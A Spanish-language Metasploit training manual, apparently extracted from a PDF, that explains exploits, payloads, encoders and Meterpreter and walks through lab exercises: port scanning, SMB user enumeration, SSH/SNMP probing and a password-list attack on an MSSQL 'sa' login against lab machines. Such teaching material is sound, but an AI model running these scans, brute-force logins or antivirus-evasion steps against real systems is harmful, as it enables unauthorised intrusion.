Vous êtes sur la page 1sur 42

Certified Offensive and Defensive Security Professional -CODSP Training

Certified Offensive and Defensive Security


Professional -CODSP Training
(Profesional Certificado en Seguridad Ofensiva y Defensiva)

Taller de entrenamiento:
Penetration Testing con Metasploit
Framework v 1.0

www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

Fundamentos y conceptos bsicos


sicos de Explotacin y el software Metasploit.

Seguramente muchas personas han escuchado hablar a un amigo, colega, un conferencista, un


docente, entre otros, sobre los Frameworks de explotacin de vulnerabilidades, y en especial
del famoso Framework de explotacin llamado Metasploit, y muy seguramente ha entrado
algn nivel de curiosidad en lo que respecta al funcionamiento, alcance e impacto que tiene
este entorno de trabajo en la seguridad de la informacin ofensiva.

En efecto proyectos como Metasploit


Metasploit han revolucionado la forma en que se realizan las
auditoras, Test de Penetracin y/o pruebas de seguridad a los sistemas de informacin, ya
que su potencia es tal, que personal tcnico en el rea de las tecnologas de la informacin sin
experiencia en seguridad de la informacin y/o usuarios mal intencionados pueden hacer uso
de Metasploit para realizar pruebas de seguridad de una forma sencilla y causar segn el
usuario, un buen dolor de cabeza a los administradores de sistemas o por el contrario,
presentar
esentar importantes alertas de seguridad de forma anticipada, para corregir los agujeros y
debilidades de seguridad de un sistema informtico. Sin embargo software como Metasploit
tiene ms positivo que negativo, ya que tener un entorno de trabajo con exploits
expl actualizados
y listos para ejecutarse, obligan a las empresas desarrolladoras de software a programar y
publicar los parches para los agujeros de seguridad que son aprovechados por los diferentes
marcos de explotacin que existen en el mercado. Como es es el caso de Metasploit.

La potencia de Metasploit radica en tres


tre conceptos fundamentales: Facilidad de uso,
multiplataforma y la comunidad.

Facilidad de uso: desde el usuario inexperto y novato en las pruebas de seguridad a sistemas
de informacin, hastaa el usuario experto que tiene las capacidades de crear cdigos de
explotacin, puede hacer uso de todo el potencial de Metasploit como parte esencial de las
herramientas que usan para la realizacin de las pruebas de seguridad a los sistemas
informticos.

Multiplataforma:: Otra razn de peso para aprovechar todo el potencial de Metasploit, es que
puede ser usado en diferentes sistemas operativos como Linux, Windows, Unix, entre otros,
sin perder en ningn momento la potencia del software Metasploit, independiente
independiente del sistema
operativo que usa el usuario final.

La comunidad: Metasploit fue liderado por un experto Hacker llamado HD Moore en el ao


2003, sin embargo con el pasar de los aos, muchos expertos en desarrollo de cdigos de
explotacin se han sumado do a este gran proyecto, con lo que miles de programadores del
mundo en la actualidad programan cdigos de explotacin de vulnerabilidades y los integran a
Metasploit, ayudando as a que la base de datos de exploit en Metasploit, sea de las ms
completas enn el mundo, y se mantenga bien actualizada.

Para comenzar de forma adecuada el estudio, anlisis y prctica con el software de explotacin
Metasploit, es importante conocer la estructura de Metasploit y algunos conceptos base
relacionados con la explotacin
n de vulnerabilidades.

www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

Metasploit: En su versin Framework, Metasploit es un software de explotacin amparado


como Software Libre y cdigo abierto, inicialmente escrito en el lenguaje de programacin
Perl, pero actualmente est escrito en el lenguaje dee programacin Ruby. A la fecha fue
adquirido por la potente empresa de seguridad llamada Rapid7, y recibe un gran nmero de
solicitud de descargas de forma anual.

Vulnerabilidad: Es una debilidad que existe en un sistema operativo, aplicacin, dispositivos


dispositiv
de red, protocolos de red, entre otros, la cual permite a un atacante o auditor de seguridad
comprometer la seguridad del sistema o dispositivo de red.

Exploit:: Es un cdigo, mtodo o va, que permite a un atacante informtico o a un auditor de


seguridad
dad explotar una vulnerabilidad conocida, para poder comprometer la seguridad de un
sistema informtico. A modo informtico, Metasploit cuenta con ms de 700 cdigos de
explotacin.

Payload: Es un cdigo que acompaa y se ejecuta despus del cdigo de explotacin,


exp con el
objetivo de poder realmente hacer algo en el sistema de la vctima,, por lo regular el cdigo
Payload se usa para realizar una conexin entre el atacante y la victima. Algunos ejemplos de
un Payload, seria la conexin a la victima por medio de una Shell de comandos como cmd.exe
por ejemplo, o conectarse a la victima usando el protocolo VNC. A modo informtico,
Metasploit cuenta con ms de 250 cdigos del tipo Payload.

Encoder: Es un componente de metasploit, el cual se usa para generar versiones


versiones trasformadas
de Payloads.

Mdulos: Los mdulos son pequeos componentes del sistema, donde cada modulo realiza
una tarea especfica,, la cual puede ser llamada en algn momento para integrarse a otros
mdulo, y poder hacer as una tarea ms representativa
tativa de forma completa y compuesta por
varios mdulos.

ShellCode: El shellcode se define como un conjunto de instrucciones que son utilizadas por un
Payload cuando el proceso de explotacin se ejecuta. Por lo regular en Shellcode est escrito
en lenguaje
je Ensamblador (Assembly). En la mayora luego de que se ejecute el cdigo
Shellcode se recibe al usuario atacante y/o auditor de seguridad una Shell de comandos.

Listener: Un listener es un componente del software Metasploit, el cual queda a la espera de


algn tipo de conexin entrante. Un ejemplo de un listener seria cuando una maquina victima
ha sido comprometida y se ha dejado algn tipo de puerta trasera o servicio ejecutndose en
la maquina vctima, y dicho servicio hace llamados de conexin a la maquina
maq atacante de
forma peridica para poder lograr de nuevo una intrusin en el equipo vctima.

Auxiliar (Auxiliary): Es un modulo de Metasploit Framework, el cual permite hacer tareas


adicionales, para resolver problemas especficos, tales como el scanning
ng de puertos, ataques
por fuerza bruta, entre otros.

Arquitectura de Metasploit:: La arquitectura modular del software Metasploit, puede verse en


la siguiente grfica.
www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

Fuente: http://www.offensive-security.com/metasploit-unleashed/Metasploit_Architecture
http://www.offensive unleashed/Metasploit_Architecture

Analizando un poco el diagrama anterior, se tiene lo siguiente:

Libraries (Libreras): Las diferentes libreras son usadas de forma clave para el adecuado
funcionamiento de Metasploit, ya que estas son una agrupacin de tareas definidas,
operaciones y funciones que pueden ser usados por los diversos mdulos que componen
Metasploit. Una de las Librerasms importantes en el Framework de explotacin
explotaci Metasploit
es la Librera Rex, la cual es la base para la mayora de tareas, ya que dentro de esta librera se
encuentran componentes de gran importancia como las implementaciones de los protocolos a
nivel de servidor y cliente.

Luego se tiene la Librera "MSF Corelibrary", esta librera tiene como funciona principal la
implementacin de todas las internases requeridas, las cuales permiten el trabajo de forma
conjunta con los mdulos de explotacin, las sesiones, entre otros.

Finalmente se encuentra laa Librera "Base library", la cual es la encargada de soportar el


trabajo con los diferentes tipos de interfaces a nivel de usuario.

Interfaces: El entorno de trabajo de Metasploit, ofrece diferentes tipos de interfaces, cada una
de ellas con sus fortalezas
zas y debilidades. Las interfaces son las siguientes:

Msfconsole: Es una de la partes ms populares y reconocidas de Metasploit Framework, ya


que es una herramienta del "tipo todo en uno", es una herramienta llena de funcionalidades,
en la cual se puede hacer
acer todo tipo de procesos en el Framework, tales como la carga de
mdulos auxiliares, el scanning de una red, procesos de enumeracin, creacin de listeners y el
lanzamiento de un exploit. Es una de las interfaces que mayor apoyo y soporte tiene con el
entorno
torno de trabajo de Metasploit. Para ingresar a la interface msfconsle, simplemente basta

www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

con abrir una shell de comandos y digitar el comando msfconsole,, tal y como se aprecia en la
siguiente imagen.

Luego debe de abrirse la interface msfconsole, tal y como se aprecia en la siguiente imagen.

Al principio la interface puede parecer un poco compleja, pero a medida que el usuario va
conociendo los diferentes comandos, se podr apreciar la facilidad de trabajo bajo la interfaces
msfconsole. Para usar laa ayuda dentro de la interface msfconsole, se debe de digitar el
siguiente comando: msfconsole -h

Un listado completo de los comandos soportados por la consola msfconsole, puede ser
consultado en la siguiente URL:

http://www.offensive-security.com/metasploit
security.com/metasploit-unleashed/Msfconsole_Commands
unleashed/Msfconsole_Commands

Msfcli: Es una consola que se ejecuta directamente desde la lnea de comandos (Shell). A
diferencia de msfconsole, msfscli es una
una consola ms limitada, en la cual de igual forma se
pueden lanzar exploits, configurar mdulos auxiliares, entre otros. A pesar de que su uso es
limitado frente a msfconsole, msfcli es una interface de gran utilidad para ejecutar tareas tales
como: probarr nuevos exploits, realizar explotacin especfica cuando el usuario conoce el
www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

exploit y las opciones, automatizacin bsica y con scripts, adems es adecuado para el
aprendizaje de Metasploit
Es importante tener presente que msfcli, solo puede manejar una shell o un hilo de conexin a
la vez. En la siguiente imagen se podr ver un ejemplo de uso de msfcli.

Msfweb: Es una consola web de fcil uso, del tipo apunte y tire o "Point-and-click".
"Point
Relativamente ha sido considerada como una consola inestable y de poco uso. Para este
modulo del di lomado en seguridad, no se har uso de este tipo de interface.

Armitage: Es una interface grafica a nivel de usuario, creada por Raphael Mudge, la cual posee
muchas caractersticas y se integra con Metasploit de forma gratuita. Para este modulo el
diplomado y/o taller de seguridad no se har mucho nfasis en Armitage, pero vale la pena
que el estudiante luego profundice en esta interface, teniendo presente de forma anticipada el
buen manejo de la consola msfconsole, y que est familiarizado con Metasploit Framework. En
el siguiente link se encuentra un interesante curso de puesta en marcha y pruebas con
Armitage. http://www.ethicalhacker.net/content/view/379/2/
En la siguiente imagen se puede observar la interface Armitage.
Armi

www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

Nota: Para los mdulos de explotacin y post-explotacin


post explotacin de este curso de seguridad, vamos a
basarnos principalmente y en un gran porcentaje en la interface msfconsole.

Metasploit Utilities (Utilidades Importantes de Metasploit): Las siguientes utilidades


u pueden
sernos de mucha ayuda en situaciones especficas que en algn momento se nos presenten al
momento que estemos realizando nuestras auditoras de sistemas, y tests de seguridad del
tipo Hacking tico.

MsfPayload: Es una utilidad de Metasploit


Metasploit que le permite al usuario final tareas de gran
importancia tales como: Generar cdigos del tipo shellcode, generar archivos ejecutables, para
pruebas de infecciones de virustroyanos por ejemplo. Con los las prcticas de laboratorio
vistas en el transcurso
curso de este diplomado, veremos que la utilidad msfpayload es de gran
ayuda para los procesos de explotacin del lado cliente (ClientSide).

MsfEncode: Los cdigos del tipo Shell code generados pro msfpayload son totalmente
funcionales, sin embargo muchos
muchos de estos cdigos contienen caracteres nulos, los cuales al ser
interpretados por muchos programas, pueden causar que el cdigo no se ejecute de forma
completa. Adems de que los Shellcode generados muy probablemente lleguen a la victima
pasando por redeses que estn siendo vigiladas y protegidas por sistemas detectores de intrusos
y software antivirus. Por todas las razones expuestas anteriormente los desarrolladores de
Metasploit crearon Msfencode, el cual es una utilidad que ayuda a evitar que el shellcode
shel
preparada por el auditor informtico y/o Pentester, sea indetectable y no contenga caracteres
que afecten la ejecucin del cdigo antes de tiempo. Metasploit contiene diferentes encoders
(Codificador) para diversas situaciones. Para identificar la lista
lista de opciones de la utilidad
msfencode, se debe de digitar el comando que se aprecia en la siguiente imagen:

Uno de los encoders ms fiables que contiene Mestaploit, es el encoderx86/shikata_ga_nai, el


cual est clasificado como Excelente (Excellent). Para ver un listado de los encoders
disponibles, digitar el siguiente comando desde la Shell de Linux Backtrack: msfencode -l

www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

Clasificacin de los Exploit y los Payloads en Metasploit Framework:

Clasificacin de los Exploit: Los cdigos de explotacin


explotacin (Exploits) en Metasploit se dividen en
dos: Exploit Activos y Exploits Pasivos

Exploit Activos: Son cdigos de explotacin que se ejecuten en la maquina victima de forma
completa, incluyendo la finalizacin del cdigo. Algunos ejemplos de exploits activos
act son:

ms08_067_netapi
smb/psexec

Exploit Pasivos: Son cdigos de explotacin que esperan a que las victimas se conecten a ellos.
Por lo regular son los cdigos exploits que estn del lado del cliente (ClienSide).

Clasificacin de Payloads: Los cdigos


cdigos del tipo Payload (Carga til) en Metasploit dividen en
tres: Singles, Stagers, y Stages.Cada uno de ellos posee una gran variedad y pueden aplicarse a
diferentes escenarios.

Singles: Son tipos de Payloads que son autnomos e independientes, y se ven representados
rep
en acciones como crear un usuario o abrir la calculadora (calc.exe) en el sistema vctima.

Stagers: Son tipos de Payloads diseados de un modo pequeo y fiables y permiten configurar
una conexin de red entre la vctima y el atacante.

Stages: Son tipos de Payloads un poco ms pesados, y permiten descargar y hacer procesos en
el sistema vctima tales como Inyeccin VNC, Meterpreter, entre otros.

Meterpreter (Meta- Interpreter) Todo en Uno El Payload Rey.

www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

Como se ver a lo largo de este curso


curso de seguridad, Metasploit Framework tiene muchos
Payloads, pero meterpreter es uno de los que ms funcionalidades tiene.. Meterpreter se
define como una extensin de Metasploit, la cual permite aprovechar al mximo las
funcionalidades de Metasploit y aumentar
aumentar el alcance en lo que respecta a comprometer a
nuestra maquina vctima.. Tambin puede definirse como un Payload avanzado.
Dentro de muchas de las funcionalidades y caractersticas que nos ofrece Meterpreter se
encuentran:

Cargar Un Keylogger(Mdulo
Keylogger(Mdulo que graba las pulsaciones en el teclado) en el sistema
victima
La comunicacin entre el atacante (Auditor) victima (objetivo de evaluacin) es cifrada
Hacer capturas de pantalla(Screenshot) en el sistema victima
Subir y descargar archivos entre el sistema
siste vctima y el atacante y/o auditor.
Apagar el sistema victima
Manipular el registro de Windows en el sistema victima (Acceso Lectura/Escritura)
Abrir una Shell de comandos en el sistema victima
Migrar de procesos en el sistema victima
Obtener los Hash dee los usuarios del sistema victima
Pivoting entre subredes en el sistema y/o red victima
Evita la creacin de procesos en el sistema victima
Evita la creacin de archivos en el disco duro del sistema victima
Es una herramienta que sirve tanto en el proceso de explotacin, como en el de post-
post
explotacin.
Se pueden usar mltiples canales de comunicacin entre la vctima y el atacante
(Auditor) usando la misma conexin.
Acceso al sistema de archivos en el sistema victima
Ejecucin de comandos en el sistema victima
vic
Obtener informacin del sistema victima
Es un Payload estable y altamente flexible
Deshabilitar el software antivirus
Capturar trafico de red en el sistema victima
Y Mucho mas

En la siguiente imagen podemos apreciar una Shell Meterpreter que se le ha dado al usuario
atacante y/o auditor de seguridad, luego de que este ha realizado una intrusin exitosa sobre
un sistema vulnerable con S.O Windows XP.

www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

Para usar la ayuda de meterpreter, basta con digitar el comando help directamente desde
des la
consola meterpreter.

A medida que avanza el curso de seguridad, veremos cmo utilizar Meterpreter en los
procesos de auditoras de seguridad y teste de penetracin. Meterpreter ser una de las
herramientas que ms se usa en los procesos de explotacin
explotacin de este curso de seguridad
informtica.

Otros Payloads importantes que se deben manejar y conocer dentro del entorno de trabajo de
Metasploit Framework:

windows/vncinject/reverse_tcp
windows/shell/reverse_tcp
windows/shell_bind_tcp

Framework Para proceder a realizar el primer proceso de


Explotacin bsica con Metasploit Framework:
explotacin usando metasploit Framework, se hace necesario tener presente los siguientes
conceptos y criterios:

La explotacin y la post-explotacin
post explotacin son las ltimas fases de proceso de auditora de
seguridad tica (Hacking tico) y/o Test de penetracin, por lo que antes de proceder
al lanzar el primer proceso de explotacin con Metasploit, el estudiante debe de
manejar de forma completa las anteriores fases del Hacking tico tales como: co
Recoleccin de informacin, Scanning de puertos, Enumeracin y Scanning de
vulnerabilidades.

El proceso de explotacin, se basa en una debilidad crtica identificada en las fases


anteriores del Hacking tico.

La mayora de procesos de explotacin se realizan usando la consola msfconsole, sin


embargo haremos uso en algunos procesos de explotacin de la consola msfcli.

Para lanzar el primer exploit usando Metasploit Framework, se deben de tener en


cuenta los conceptos que se mencionan a continuacin, en en lo que respecta a
explotacin bsica.

Tener en cuenta y como referencia los comandos de msfconsole, los cuales se pueden
encontrar de forma completa en la siguiente Url: http://www.offensive-
http://www.offensive
security.com/metasploit
security.com/metasploit-unleashed/Msfconsole_Commands

Conceptos de explotacin bsica con Metasploit Framework: teniendo presente que


metasploit contiene muchsimos mdulos, exploit, auxiliares, payloads, entre otros, se dificulta
dific
un poco recordar cada uno de los mdulos, por lo tanto es importante conocer y practicar
sobre los siguientes comandos de la consola msfconsole, para facilitar as el uso de cada uno
de los componentes que requeridos para los procesos de explotacin:

www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

msf> show exploits: Este comando muestra todos los cdigos de explotacin que estn
disponibles en metasploit Framework (La cantidad de exploits depende de la fecha de
actualizacin de metasploit). El anterior comando es de gran importancia, ya que cada da
d se
descubren nuevas vulnerabilidades, y por consenciente se crean e integran nuevos cdigos de
explotacin a metasploit framework. En la siguiente imagen se puede apreciar un ejemplo de
la ejecucin de este comando.

msf> show auxiliary: Los mdulos auxiliares en metasploit, tienen variedad de propsitos,
tales como: Scanners de red, Scanners de servicios, fuzzers, entre otros. Por lo tanto la
ejecucin del comando en mencin muestra en pantalla los mdulos auxiliares disponibles
para metasploit framework.
work. (La cantidad de mdulos auxiliares depende de la fecha de
actualizacin de metasploit)

Prcticas de Laboratorio:

Prctica de laboratorio numero 1


Objetivos:: Ingresar y hacer uso de las diferentes consolas que ofrece Metasploit, tales como
la msfconsole y la msfcli.
Recursos:: VMWARE, Metasploit Framework y Backtrack 5

Ejecucin de la prctica de laboratorio 1:

Paso 1:: Ingresar a Linux Backtrack, y abrir una shell de comandos (Terminal). (Recordar que el
usuario y passqord respectivamente para para Backtrack, es root y toor. Luego desde la shell de
comandos digitar startx para entrar al modo grafico)

www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

Paso 2: abrir la consola msfconsole, lo cual se logra digitando el comando msfconsole desde la
terminal de comandos de Linux Backtrack

Luego que se digite el comando msfconsole, debe de salir lo siguiente:

En la anterior imagen se puede apreciar que ya estamos dentro de la interface msfconsole. En


el ingreso a la interface, el sistema nos indica la versin de metasploit, el nmero de exploits,
exploi
el nmero de mdulos auxiliares, el nmero de PAYLOADS, entre otros.

Anotacin: Para ingresar a la interface msfconsole, y a las otras interfaces que nos ofrece
metasploit, tambin lo podemos hacer por el entorno grafico.

www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

Paso 3: digitar el comando msfconsole -h, para poder ver la ayuda de la interface msfconsole

Paso 4: salir de la interface msfconsole con el comando exit.

Paso 5: Una vez que se tiene una visin general sobre algunas de las interfaces de metasploit,
es importante tener presente
presen que el software debe de quedar actualizado a los ltimos
exploits, payloads, mdulos auxiliares, entre otros. Para actualizar metasploit, simplemente
desde una shell de msfconsole,
msfconsole digitamos el comando msfupdate.

O tambin puede hacerse de la interface


interface grafica, tal y como se muestra en la siguiente
imagen.

www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

Anotacin:: Para efectos de este taller, ya se entrega Linux Backtrack con Metasploit
actualizado al da. Lo anterior para fines de optimizar tiempos, ya que actualizar metasploit en
el equipo e cada estudiante, puede tomar algn tiempo, segn la velocidad del canal de
Internet en donde se dicta el taller.

Es altamente importante, que cuando actualicen metasploit en sus casas, configuren el


bloqueador de scripts de firefox en sitio https://metasploit.com,
https://metasploit.com, como un sitio seguro, para
que no presenten problemas al momento de actualizar metasploit.

Prctica de laboratorio numero 2


Objetivos: Verificar la conexin de Metasploit con un sistema de bases de daos, para ir
almacenando la informacin de los host que se estn evaluando a nivel de seguridad, en lo
que respecta a procesos de scanning de puertos.
www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

Recursos:: VMWARE, Metasploit Framework, Windows Server y Backtrack 5

Observaciones:
Antes de proceder a realizar la prctica, verificar que las maquinas Linux Backtrack y
Windows 2003 Server estn conectados en el mismo segmento de red, y que hay ping
entre ambas maquinas.
Es altamente importante tener conocimientos bsicos-medios
bsicos medios al respecto de los
servicios de red que se estn evaluando y prximamente
prximamente atacando, para comprender
mejor el trabajo de anlisis de seguridad y/o penetration testing realizado.

Ejecucin de la prctica de laboratorio 2:

Conexin con una base de datos y Scanning de Puertos

Paso 1:: Ingresar a la interface msfconsole

Anotacin: En versiones anteriores de metasploit se haca necesario configurar metasploit


con una base de datos para poder plasmar de una manera ms ordenada los resultados de las
actividades que se iban ejecutando en el proceso de pruebas de penetracin.
penetracin. Actualmente la
ltima versin de metasploit solo soporta conexin para base PostgreSQL. Para poder ver el
status de conexin de metasploit con la base de datos PostgreSQL se debe de digitar el
siguiente comando: db_status

Paso 2: digitar el comando db_status, para identificar que metasploit est conectado a una
base de datos llamada msf3dev
dev

Paso 3:: digitar el comando db_nmap direccin IP Target (Windows Server 2003)

Paso 4: digitar el comando hosts para ver los resultados de los host que se tienen guardados
en la base de datos. Para el siguiente caso, se tienen dos host.

www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

Anotacin: En ocasiones cuando el equipo de trabajo de un proceso de auditora de seguridad


y/o penetration testing es representativo, y se hacen pruebas en diferentes momentos y de
lugares distintos,, es importante ejecutar nmap de firma directa y guardar los resultados en un
archivo con algn formato en especial, por ejemplo en XML.

Paso 5:: realizar un scanning de puertos usando nmap, con la opcin de exportar los resultados
resul
del scanning a un archivo del tipo XML. El scanning de puertos se puede hacer a un solo host, o
directamente a toda una subred. Para el caso hacerlo sobre la maquina Windows 2003 Server.

Los resultados del anterior proceso de scanning, deberan de ser importados a la base de datos
de metasploit.

Paso 6:: Una vez que se tienen algunos host registrados en la base de datos, con el comando
services,, se pueden identificar los servicios que estn a la escucha en las maquinas victimas.

www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

Paso 7: realizar
zar un proceso de Scanning de puertos usando los modulos auxiliares de nmap que
estn dentro de metasploit. Para lograrlo primero debemos de hacer una na bsqueda con el
comando search de los mdulos auxiliares de metasploit que tiene la funcin de scanning de
puertos, lo cual e logra con el siguiente comando: search portscan

Luego se obtiene los siguientes resultados:

www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

Paso 8: Seleccionar el modulo auxiliar de scanning llamado auxiliary/scanner/portscan/syn y


seleccionarlo con el comando use de metasploit, tal y como se muestra en el siguiente
comando: use auxiliary/scanner/portscan/syn

Dar el comando show options para ver las variables que necesita el modulo para poder
trabajar.

Paso 9:: Indicar las variables que se necesita para realizar el scanning
scanning de puertos, para el caso
solo vamos a asignar valores a la variable RHOST que es la maquina target-victima,
target victima, a la cual el
vamos a realizar el scanning de puertos, y vamos a asignarle valores a la variable PORTS, que
corresponde a los puertos TCP que vamos a verificar si estn abiertos, cerrados o filtrados.
Segn lo anterior los comandos para asignar los valores para ambas variables son:

set RHOST IP de Windows Server


set PORTS 25,53,80,110,135,139,445,1433,3389

Paso 9:: El ltimo paso es digitar el


e comando show options para ver que todo est bien, y si no
hay problemas,, entonces de procede a ejecutar el modulo Auxiliar de scanning de puertos con
el comando run

www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

Una vez que se ejecute el modulo auxiliar contra uno dee los targets (Objetivos de evaluacin),
debe de salir los siguientes resultados (Recordar que las direcciones IP varan de acuerdo a
cada target de cada segmento de red de las maquinas virtuales)

Ir ms all: Para usuarios ms avanzados y/o experimentados con metasploit, que tal si
ejecutan el anterior comando, pero colocando un sniffer como wireshark de forma paralela al
scanning de puertos, para capturar el trfico y verificar el trfico de red para un scanning de
puertos del tipo SYN.

Prctica de laboratorio numero 3


Objetivos: Identificar y utilizar algunos de los mdulos auxiliares que tiene Metasploit
M para
realizar procesos de scanning de puertos para aplicaciones y/o protocolos especficos,
especficos tanto a
nivel TCP como para UDP.

Recursos: VMWARE, Metasploit Framework, Windows Server 2003,, Windows XP y Backtrack


5

Observaciones:
Antes de proceder a realizar la prctica, verificar que las maquinas Linux Backtrack y
Windows 2003 Server estn conectados en el mismo segmento de red, y que hay ping
entre ambas maquinas.
Es altamentete importante tener conocimientos bsicos-mediosmedios al respecto de los
servicios de red que se estn evaluando y prximamente atacando, para comprender
mejor el trabajo de anlisis de seguridad y/o penetration testing realizado.

Ejecucin de la prctica de laboratorio 3:

Paso 1: Trabajando con el Protocolo SMB: Realizar un proceso de scanning del servicio SMB
(Server Message Block Scanning), para lo cual se debe de seleccionar el modulo auxiliar
auxiliary/scanner/smb/smb_version Para poder usar este modulo,
auxiliary/scanner/smb/smb_version. o, se debe realizar de forma
secuencial lo siguiente:
www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

seleccionar el modulo auxiliar con el comando use


auxiliary/scanner/smb/smb_version
Luego se debe de digitar el comando show options,, para ver las opciones del modulo
auxiliar
Luego se le coloca la variable
variable RHOSTS, que para el caso de este laboratorio, seria para
asignar la direccin IP de Windows 2003 Server.
De nuevo digitamos show options y si todo est bien, ejecutamos el mdulos auxiliar
con el comando exploit.

En la siguiente imagen encuentras de forma secuencial todos los pasos mencionados


anteriormente.

Si el exploit se ejecuta correctamente, deber de mostrar algo similar a la siguiente


imagen, donde se puede apreciar el sistema operativo del target (Victima -objetivo de
anlisis de seguridad),
d), el dominio al que est asociado la vctima,, y el nombre del
servidor

www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

Paso 2: Trabajando con el Protocolo SMB: Realizar un proceso de enumeracin de usuarios y


grupos del nuestra vctima o target, que para el caso es Windows 2003 Server,
Serve lo cual se logra
usando el modulo auxiliar auxiliary/scanner/smb/smb_lookupsid.
auxiliary/scanner/smb/smb_lookupsid

Para poder usar este modulo, se debe realizar de forma secuencial lo siguiente:

use auxiliary/scanner/smb/smb_lookupsid
show options
set RHOSTS IP Windows Server
exploit

En la siguiente
nte imagen encuentras de forma secuencial todos los pasos mencionados
anteriormente.

Si el modulo auxiliar se ejecuta de forma correcta, deberemos tener los nombres de


usuarios y grupos que existen actualmente en el servidor Windows 2003 Server.

www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

Paso 3: Trabajando con el Protocolo SSH: Realizar un proceso de identificacin de la versin


del servidor SSH que se encuentra en el equipo Windows XP SP2. SP2 Lo anterior se logra
seleccionando el modulo auxiliar de metasploit llamado auxiliary/scanner/ssh/ssh_version
auxiliary/scanner/ssh/ssh

Para poder usar este modulo, se debe realizar de forma secuencial lo siguiente:

use auxiliary/scanner/ssh/ssh_version
show options
set RHOSTS IP Windows XP SP2
exploit

En la siguiente imagen encuentras de forma secuencial todos los pasos mencionados


mencio
anteriormente.

Paso 4: Trabajando con el Protocolo SNMP: Realizar un proceso de identificacin de recursos


que se tengan compartidos en la estacin de trabajo Windows XP SP2, usando el protocolo
simple de administracin de red. Lo anterior se logra
logra seleccionando el modulo auxiliar de
metasploit llamado use auxiliary/scanner/snmp/snmp_enumshares

use auxiliary/scanner/snmp/snmp_enumshares
show options
set RHOSTS 192.168.137.28
run

www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

En la siguiente imagen encuentras de forma secuencial todos los pasos mencionados


anteriormente.

Anotacin: Y de forma similar existen muchsimos ms mdulos auxiliares a nivel de scanners


de puertos y aplicaciones, los cuales evalan otros protocolos tales como FTP, MSSQL, SNMP,
entre otros.

Prctica de laboratorio numero 4


Objetivos:: Identificar y utilizar algunos de los mdulos auxiliares que tiene Metasploit para
realizar procesos de anlisis de vulnerabilidades para aplicaciones y/o protocolos especficos,
tanto a nivel TCP como para UDP.U

Recursos: VMWARE, Metasploit Framework, Windows Server 2003, Windows XP y Backtrack


5

Observaciones:
Antes de proceder a realizar la prctica, verificar que las maquinas Linux Backtrack y
Windows 2003 Server estn conectados en el mismo segmento de de red, y que hay ping
entre ambas maquinas.
Es altamente importante tener conocimientos bsicos-medios
bsicos medios al respecto de los
www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

servicios de red que se estn evaluando y prximamente atacando, para comprender


mejor el trabajo de anlisis de seguridad y/o penetration
penetration testing realizado.
Como actividad complementaria y para evitar todo el tiempo que la aplicacin nessus
se demora actualizando los plug-in,
plug in, se puede usar el software nessus que esta
instalado en la maquina Windows XP

Anotacin: Es altamente recomendable


recomendable que si el estudiante no conoce como trabaja MSSQL
Server, lo investigue por cuenta propia con el fin de mejorar los conocimientos relacionados
con auditorias de sistemas intrusivas del tipo Penetration Testing, ya que durante la siguiente
practica de laboratorio, va a comprometer a SQL Server, en lo que respecta a violentar la
seguridad del motor de bases de datos, y del sistema operativo que lo contiene..

Ejecucin de la prctica de laboratorio 4:

T 1433: Si se tiene en cuenta los procesos


Paso 1: Scanning de Puertos y version del puerto TCP
de scanning de puertos realizados en laboratorios pasados, se puede observar que el puerto
1433 TCP est en estado
tado Listening (Abierto), esperando conexiones, adems si se realiza un
proceso de scanning de puertos a este puerto en especial con la opcin -sV
sV de nmap, se puede
apreciar que el servicio y versin que estn detrs de ese puerto, son Microsoft SQl Server
2005 SP1. Proceder a realizar el scanning de puertos, segn los comandos de la siguiente
imagen.

Paso 2: Identificacin de vulnerabilidades servicios MSSQL: El siguiente paso es realizar un


proceso de identificacin de vulnerabilidades,
vulnerabilidades, para el caso vamos a buscar vulnerabilidades en
el login y password del usuario SA (System Administrator) del sistemaa de bases de datos MS-
MS
SQL SERVER. Para lograr identificar vulnerabilidades en cuanto a credenciales de acceso
dbiles,, podemos usar el siguientesiguient modulo auxiliar de metasploit llamado
auxiliary/scanner/mssql/mssql_login
auxiliary/scanner/mssql/mssql_login.

Para poder usar este modulo, se debe


debe realizar de forma secuencial lo siguiente:

use auxiliary/scanner/mssql/mssql_login
show options
set PASS_FILE /pentest/passwords/john/password.lst
set RHOSTS 192.168.137.28 (Aqu colocas la direccin IP de Servidor Windows)
set VERBOSE false
show options
exploit
www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training

Como se puede apreciar en las anteriores imgenes, en modulo auxiliar mssql_login,


mssql_login logro
identificar una contrasea dbil para el usuario SA (System Administrator), que para el caso,
la contrasea de acceso para el usuario SA es password

Ir ms all: Para complementar este ejercicio, insertar realizar un anlisis de vulnerabilidades


vulnerabili
usando el Software NESSUS, revisar en los reportes de este software, que se identifican otro
tipo de vulnerabilidades criticas que pueden ser explotadas usando Metasploit Framework.

Paso 2: Identificacin de vulnerabilidades servicios HTTP: Con herramientas diversas que


pueden encontrase en la versin de Linux Backtrack, tambin pueden realizarse procesos de
anlisis de vulnerabilidades. Vamos a utilizar el software NETCAT para realizar un simple

